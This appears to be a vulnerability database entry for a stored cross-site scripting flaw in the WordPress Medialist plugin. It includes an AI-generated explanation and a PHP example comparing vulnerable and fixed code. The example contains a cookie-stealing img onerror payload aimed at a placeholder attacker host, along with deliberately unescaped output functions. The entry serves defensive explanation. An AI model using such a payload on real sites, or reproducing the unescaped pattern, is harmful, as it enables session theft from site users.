VYPR
Medium severity6.5NVD Advisory· Published Nov 8, 2023· Updated Apr 29, 2026

CVE-2023-46640

Description

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in D. Relton Medialist plugin <= 1.3.9 versions.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated stored XSS in the WordPress Medialist plugin <= 1.3.9 lets users with contributor or higher privileges inject arbitrary scripts that execute in other users' browsers.

Root Cause

The Medialist plugin for WordPress, versions 1.3.9 and earlier, contains a stored Cross-Site Scripting (XSS) vulnerability. An authenticated user with contributor-level access or higher can submit arbitrary web script or HTML that the plugin stores without sanitization and later renders without output encoding. The stored payload is therefore served to anyone who views the affected page. Note that the WordPress `unfiltered_html` capability, which contributors lack, only filters core post content; a field saved by a plugin's own handler receives no filtering unless the plugin applies it [1].
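The following is an added illustration of the unsanitized-input, unencoded-output pattern described above and of its fix; it is not code from the Medialist plugin, whose actual stored field and rendering location the advisory does not identify. All `ml_demo_*` names, the in-memory "store", and the payload are constructed for this example, and the `esc_html()` / `sanitize_text_field()` shims are stand-ins so the file runs with plain `php` outside WordPress (inside WordPress the real functions are used instead).

```php
<?php
// Added example, not Medialist's code. All ml_demo_* names are hypothetical.

// Stand-ins so this runs with plain `php`; skipped inside WordPress, where the
// real esc_html() and sanitize_text_field() already exist.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        // Entity-encode <, >, &, " and ' so stored text cannot become markup.
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        // Approximation of the WordPress behaviour: strip tags, drop control
        // characters, trim surrounding whitespace.
        $str = strip_tags( (string) $str );
        $str = preg_replace( '/[\x00-\x1F\x7F]/u', '', $str );
        return trim( $str );
    }
}

// Constructed stand-in for the plugin's persisted item data (in WordPress this
// would typically be post meta or an option).
$GLOBALS['ml_demo_store'] = array();

// Vulnerable pattern: the value a contributor submitted is stored as-is and
// echoed as-is into the page. Nothing between the attacker and the victim's
// browser neutralises the markup.
function ml_demo_save_vulnerable( $item_id, $submitted_note ) {
    $GLOBALS['ml_demo_store'][ $item_id ] = $submitted_note;
}
function ml_demo_render_vulnerable( $item_id ) {
    $note = $GLOBALS['ml_demo_store'][ $item_id ] ?? '';
    return '<div class="ml-note">' . $note . '</div>';
}

// Hardened pattern: sanitize on input and, independently, encode on output.
// Output encoding is the control that actually stops the XSS, and it also
// covers rows that were written before the input sanitization existed.
function ml_demo_save_fixed( $item_id, $submitted_note ) {
    $GLOBALS['ml_demo_store'][ $item_id ] = sanitize_text_field( $submitted_note );
}
function ml_demo_render_fixed( $item_id ) {
    $note = $GLOBALS['ml_demo_store'][ $item_id ] ?? '';
    return '<div class="ml-note">' . esc_html( $note ) . '</div>';
}

// Constructed payload of the kind a contributor-level account could submit.
// attacker.example is a placeholder host.
$payload = 'Trailer <img src=x onerror="document.location=\'https://attacker.example/?c=\'+document.cookie">';

// 1. Vulnerable save + vulnerable render: the <img onerror> reaches the browser
//    as live markup and runs when an editor or admin views the item.
ml_demo_save_vulnerable( 1, $payload );
echo "vulnerable:               " . ml_demo_render_vulnerable( 1 ) . "\n";

// 2. Legacy row written by the vulnerable code, rendered by the fixed code:
//    angle brackets and quotes are entity-encoded, so the payload is inert text.
ml_demo_save_vulnerable( 2, $payload );
echo "fixed render, legacy row: " . ml_demo_render_fixed( 2 ) . "\n";

// 3. Fixed save + fixed render: the tag is stripped at save time as well, and
//    whatever remains is still encoded on output (defence in depth).
ml_demo_save_fixed( 3, $payload );
echo "fixed save + render:      " . ml_demo_render_fixed( 3 ) . "\n";
```

Run with `php ml_demo.php` and compare the three lines. If a field legitimately needs limited HTML (links, emphasis), the WordPress choice is `wp_kses_post()` or `wp_kses()` with an explicit allow-list on both save and output rather than `esc_html()`; either way the encoding or filtering must happen at the point of output, because `sanitize_text_field()` alone does nothing for data that is already in the database.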

Exploitation

To exploit this vulnerability, an attacker must first obtain a WordPress account with at least contributor privileges, for example on a site that allows open registration or has a compromised low-privilege account. No special network position is required; the payload is submitted entirely through the WordPress admin interface. The stored payload fires when a victim, typically a privileged user such as a site administrator, loads the page on which the plugin renders it (CVSS UI:R), so the attack chain depends on that user viewing the crafted content, whether by following a link to it or by encountering it in normal site use [1].

Impact

A successful attack allows the malicious actor to inject malicious scripts, including redirects, advertisements, or other HTML payloads, into the target website. These scripts execute in the browsers of unsuspecting visitors, potentially leading to credential theft, session hijacking, defacement, or further compromise of the site. The vulnerability is rated as Medium severity with a CVSS v3 base score of 6.5 [1].

Mitigation

The vulnerability is resolved in version 1.4.0 of the Medialist plugin. Users are strongly advised to update immediately. For those who cannot update, a mitigation rule is available through Patchstack to block attacks until the patch can be applied. Given that such XSS vulnerabilities are commonly used in mass-exploit campaigns, prompt remediation is critical [1].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1
  • cpe:2.3:a:drelton:medialist:*:*:*:*:*:wordpress:*:*
    Range: <=1.3.9

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

1

News mentions

0

No linked articles in our index yet.